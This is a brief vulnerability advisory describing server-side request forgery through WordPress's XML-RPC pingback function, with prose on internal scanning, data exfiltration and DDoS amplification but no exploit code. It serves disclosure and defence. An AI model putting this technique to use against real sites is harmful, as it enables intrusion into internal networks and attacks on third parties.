H3-2026-0042¶

WordPress XML-RPC Pingback Server-Side Request Forgery Vulnerability

Description¶

The WordPress XML-RPC pingback functionality can be abused to make server-side requests to attacker-controlled or internal servers. By sending a crafted pingback.ping request, an attacker can force the WordPress server to issue HTTP requests to arbitrary URLs, enabling server-side request forgery.

Impact¶

An attacker can use the WordPress server as a proxy to scan internal networks, access internal services not exposed to the internet, and potentially exfiltrate data. The pingback mechanism can also be used for DDoS amplification attacks against third-party targets.

References¶

• CWE-918: Server-Side Request Forgery (SSRF)
• WordPress Core - Unauthenticated Blind SSRF